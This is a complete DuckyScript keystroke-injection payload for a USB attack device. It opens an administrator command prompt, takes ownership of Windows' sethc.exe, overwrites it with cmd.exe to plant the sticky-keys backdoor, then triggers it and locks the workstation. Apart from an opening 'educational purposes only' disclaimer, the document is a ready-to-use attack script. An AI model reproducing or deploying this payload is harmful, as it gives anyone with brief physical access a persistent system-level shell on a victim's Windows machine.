REM - DISCLAIMER: This script was made for educational purposes only and isn't intended for any sort of malicious use.

REM Open the "Run" dialogue
REM --------------------------
DELAY 700
GUI r

REM Run CMD by typing cmd.exe in the "Run" dialogue
REM --------------------------
DELAY 700
STRING cmd.exe

REM Run CMD as Administrator
REM --------------------------
DELAY 700
CTRL-SHIFT ENTER
DELAY 3000
LEFT
DELAY 700
ENTER

REM Take ownership of the sethc.exe program
REM --------------------------
DELAY 3000
STRING takeown /f c:\Windows\System32\sethc.exe
ENTER

REM Give full control (F) over the file to the Administrator
REM --------------------------
DELAY 700
STRING icacls C:\Windows\System32\sethc.exe /grant Administrator:F
ENTER

REM Copy the cmd.exe program into the sethc.exe program
REM --------------------------
DELAY 700
STRING copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
ENTER
DELAY 700
STRING All
ENTER

REM Close the current terminal session
REM --------------------------
DELAY 700
STRING exit
ENTER

REM Active sticky keys
REM --------------------------
DELAY 700
SHIFT SHIFT
DELAY 700
SHIFT SHIFT
DELAY 700
SHIFT SHIFT
DELAY 700
SHIFT SHIFT
DELAY 700
SHIFT SHIFT
DELAY 700
SHIFT SHIFT

REM Display a message onto the terminal
REM --------------------------
DELAY 1000
STRING echo Sticky Keys has been been successfully tampered with
ENTER

REM Lock the session and close the terminal
REM --------------------------
DELAY 5000
STRING rundll32.exe user32.dll,LockWorkStation & exit
ENTER
